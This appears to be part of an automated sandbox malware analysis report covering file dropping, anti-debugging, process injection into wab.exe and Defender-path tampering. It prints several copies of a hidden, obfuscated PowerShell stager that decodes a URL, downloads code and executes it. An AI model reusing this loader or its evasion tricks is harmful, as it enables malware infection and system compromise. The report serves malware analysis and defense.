Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Uninstall.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7892 Thread sleep count: 5858 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7896 Thread sleep count: 3995 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7924 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: wab.exe, 00000008.00000002.2375969322.0000000006288000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW t.
Source: wab.exe, 00000008.00000002.2375969322.00000000062E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wab.exe, 00000008.00000002.2375969322.00000000062E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.2188971993.000001E2CCF37000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ )
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07B449B0 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk, 5_2_07B449B0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: amsi64_7596.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7596, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7844, type: MEMORYSTR
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3F20000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2C9FA4C
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng 
Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOrdinuHiplir SysteP.pulsHy Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf 
');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOr Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sublicense = 1;$solbatteri='sub';$solbatteri+='strin';$solbatteri+='g';function udvindende($twistende){$lastelinie=$twistende.length-$sublicense;for($firblok=5;$firblok -lt $lastelinie;$firblok+=6){$lunelsen+=$twistende.$solbatteri.invoke( $firblok, $sublicense);}$lunelsen;}function unschool($squimmidge){. ($jetmotoren) ($squimmidge);}$pedicures=udvindende 'testimmiljlointerzshel imil.elcol.clbifigaovers/stepp5ne kw. a er0ego r konku(indskwin vii.ernin kaksdtrillobyggewkoreisdu,st o,debn xenotprisl matem1unher0 inla.pr,fa0samme;ote.t brnesw ,isciaureansenso6under4glyce; ihra notatxsoci 6 f.ap4terzi; honn gyro.rhoultv s,ns:spell1oli.t2indbl1s end.capit0kratt)c,oic genetgrysteepremac,mudsknonubodevis/ s or2misdd0.dgan1misha0stjyd0velst1haa d0 s,ip1.ndig noradfor iei nergrse eredy.tbffluoroindpaxsludr/mod.r1spu.r2 smut1ugl,d.ingra0se ue ';$privileged=udvindende 'ob,diua.dsesmsk,ne ,arar matr-jord.auterog reesebe trnte.tatdis i ';$sprngningers=udvindende 'juncah,ripyt sfyrtsupr.pfa.lesf,rpo:prunt/argum/ d.scwelskowmumifw hers.dollasacidoesemilnmisled lyndsimparpkendea unnic ugeaethist.dokhacomnipo ugtim.allw/curetp o firstipuogl zi/guerid skablba st/jogurwintralvitr oshirtrsamfuhslvsmssk,dk ';$forlovede=udvindende 'rel,a>r,kla ';$jetmotoren=udvindende 'cor,ii klisecuchix kyse ';$tendrilous='handleformerne';$veta13 = udvindende 'skytsecentrcallithunguio tu.i ,ndka%mbleramonocp intepforstd filiahikketteg,vaya.ne% ou.w\cytopfvetere,likvtsa.tlta.riglmelleejakob.tugtehtoilfaun,ernpuebl folk&nonpa&l.dar xx.ndedeamic regihincanorhila betint.agua ';unschool (udvindende 'flo,r$cypriglevnelsluk ouns ib in.lacompulr,tsf:nedgrsovertasjoflludsteusorbet druke waver.uadresnil,r samo=hneky(yderzcnain m compd arga helt/hetercdekup ,ylli$askebvdusineflowethal,tafar,e1 akva3tjrne) aktf ');unschool (udvindende ' ustk$teh ng 
ddssl,ndelosentibretirasaddll thor:sacchfp.ereludgandnavernseedeikphesn ove,ggrnsesindstt undeiarched alkiedisk,n ove,sratin=inter$.tults sentp udvirbenzin vantgp rapnkis.lid,rignposefgsub eetravbr nonss mand. ginnsrnerepallesl smediaktiotminke( rejs$antiffj sovoner,orw.resl stroocheefvnaadsebirdidtree e fi.s)gulds ');$sprngningers=$fldningstidens[0];$unaccidented180= (udvindende 'phyll$affejgsandwlbolvro k inbl peaahac,bl jagt:lngstbsiolaa harrsprotoiallemc tornh de.mrclassomell mcutt iforr okalibl skrfec.nce=remi nxericegreenw arry-n.npeokajakbuvejsj zoquebioc,calgovt rotu .nchsconvey geogstermitretteeberrimroege.h gisn.antaeinductgtehu.gr ndwer bre s,lvbholoccmargal aktai ko.oelocasn usigt');$unaccidented180+=$saluterer[1];unschool ($unaccidented180);unschool (udvindende 'disle$ski,db.aphoarejems de.fibage c prochunshirvip.tod alymcurviistalaomichelzon,newall,.ko.sehfiskeeu.cita spelddezine n.hersentistaste[ pulv$smagspstjerr th riunderv fanaitillalp.odue turbgkonveetilskdmorfo]ubety=e hel$ planphoarseekspod molli holdcordinuhiplir systep.pulshy
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$sublicense = 1;$solbatteri='sub';$solbatteri+='strin';$solbatteri+='g';function udvindende($twistende){$lastelinie=$twistende.length-$sublicense;for($firblok=5;$firblok -lt $lastelinie;$firblok+=6){$lunelsen+=$twistende.$solbatteri.invoke( $firblok, $sublicense);}$lunelsen;}function unschool($squimmidge){. ($jetmotoren) ($squimmidge);}$pedicures=udvindende 'testimmiljlointerzshel imil.elcol.clbifigaovers/stepp5ne kw. a er0ego r konku(indskwin vii.ernin kaksdtrillobyggewkoreisdu,st o,debn xenotprisl matem1unher0 inla.pr,fa0samme;ote.t brnesw ,isciaureansenso6under4glyce; ihra notatxsoci 6 f.ap4terzi; honn gyro.rhoultv s,ns:spell1oli.t2indbl1s end.capit0kratt)c,oic genetgrysteepremac,mudsknonubodevis/ s or2misdd0.dgan1misha0stjyd0velst1haa d0 s,ip1.ndig noradfor iei nergrse eredy.tbffluoroindpaxsludr/mod.r1spu.r2 smut1ugl,d.ingra0se ue ';$privileged=udvindende 'ob,diua.dsesmsk,ne ,arar matr-jord.auterog reesebe trnte.tatdis i ';$sprngningers=udvindende 'juncah,ripyt sfyrtsupr.pfa.lesf,rpo:prunt/argum/ d.scwelskowmumifw hers.dollasacidoesemilnmisled lyndsimparpkendea unnic ugeaethist.dokhacomnipo ugtim.allw/curetp o firstipuogl zi/guerid skablba st/jogurwintralvitr oshirtrsamfuhslvsmssk,dk ';$forlovede=udvindende 'rel,a>r,kla ';$jetmotoren=udvindende 'cor,ii klisecuchix kyse ';$tendrilous='handleformerne';$veta13 = udvindende 'skytsecentrcallithunguio tu.i ,ndka%mbleramonocp intepforstd filiahikketteg,vaya.ne% ou.w\cytopfvetere,likvtsa.tlta.riglmelleejakob.tugtehtoilfaun,ernpuebl folk&nonpa&l.dar xx.ndedeamic regihincanorhila betint.agua ';unschool (udvindende 'flo,r$cypriglevnelsluk ouns ib in.lacompulr,tsf:nedgrsovertasjoflludsteusorbet druke waver.uadresnil,r samo=hneky(yderzcnain m compd arga helt/hetercdekup ,ylli$askebvdusineflowethal,tafar,e1 akva3tjrne) aktf 
');unschool (udvindende ' ustk$teh ng ddssl,ndelosentibretirasaddll thor:sacchfp.ereludgandnavernseedeikphesn ove,ggrnsesindstt undeiarched alkiedisk,n ove,sratin=inter$.tults sentp udvirbenzin vantgp rapnkis.lid,rignposefgsub eetravbr nonss mand. ginnsrnerepallesl smediaktiotminke( rejs$antiffj sovoner,orw.resl stroocheefvnaadsebirdidtree e fi.s)gulds ');$sprngningers=$fldningstidens[0];$unaccidented180= (udvindende 'phyll$affejgsandwlbolvro k inbl peaahac,bl jagt:lngstbsiolaa harrsprotoiallemc tornh de.mrclassomell mcutt iforr okalibl skrfec.nce=remi nxericegreenw arry-n.npeokajakbuvejsj zoquebioc,calgovt rotu .nchsconvey geogstermitretteeberrimroege.h gisn.antaeinductgtehu.gr ndwer bre s,lvbholoccmargal aktai ko.oelocasn usigt');$unaccidented180+=$saluterer[1];unschool ($unaccidented180);unschool (udvindende 'disle$ski,db.aphoarejems de.fibage c prochunshirvip.tod alymcurviistalaomichelzon,newall,.ko.sehfiskeeu.cita spelddezine n.hersentistaste[ pulv$smagspstjerr th riunderv fanaitillalp.odue turbgkonveetilskdmorfo]ubety=e hel$ planphoarseekspod molli holdcor
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sublicense = 1;$solbatteri='sub';$solbatteri+='strin';$solbatteri+='g';function udvindende($twistende){$lastelinie=$twistende.length-$sublicense;for($firblok=5;$firblok -lt $lastelinie;$firblok+=6){$lunelsen+=$twistende.$solbatteri.invoke( $firblok, $sublicense);}$lunelsen;}function unschool($squimmidge){. ($jetmotoren) ($squimmidge);}$pedicures=udvindende 'testimmiljlointerzshel imil.elcol.clbifigaovers/stepp5ne kw. a er0ego r konku(indskwin vii.ernin kaksdtrillobyggewkoreisdu,st o,debn xenotprisl matem1unher0 inla.pr,fa0samme;ote.t brnesw ,isciaureansenso6under4glyce; ihra notatxsoci 6 f.ap4terzi; honn gyro.rhoultv s,ns:spell1oli.t2indbl1s end.capit0kratt)c,oic genetgrysteepremac,mudsknonubodevis/ s or2misdd0.dgan1misha0stjyd0velst1haa d0 s,ip1.ndig noradfor iei nergrse eredy.tbffluoroindpaxsludr/mod.r1spu.r2 smut1ugl,d.ingra0se ue ';$privileged=udvindende 'ob,diua.dsesmsk,ne ,arar matr-jord.auterog reesebe trnte.tatdis i ';$sprngningers=udvindende 'juncah,ripyt sfyrtsupr.pfa.lesf,rpo:prunt/argum/ d.scwelskowmumifw hers.dollasacidoesemilnmisled lyndsimparpkendea unnic ugeaethist.dokhacomnipo ugtim.allw/curetp o firstipuogl zi/guerid skablba st/jogurwintralvitr oshirtrsamfuhslvsmssk,dk ';$forlovede=udvindende 'rel,a>r,kla ';$jetmotoren=udvindende 'cor,ii klisecuchix kyse ';$tendrilous='handleformerne';$veta13 = udvindende 'skytsecentrcallithunguio tu.i ,ndka%mbleramonocp intepforstd filiahikketteg,vaya.ne% ou.w\cytopfvetere,likvtsa.tlta.riglmelleejakob.tugtehtoilfaun,ernpuebl folk&nonpa&l.dar xx.ndedeamic regihincanorhila betint.agua ';unschool (udvindende 'flo,r$cypriglevnelsluk ouns ib in.lacompulr,tsf:nedgrsovertasjoflludsteusorbet druke waver.uadresnil,r samo=hneky(yderzcnain m compd arga helt/hetercdekup ,ylli$askebvdusineflowethal,tafar,e1 akva3tjrne) aktf ');unschool (udvindende ' ustk$teh ng 
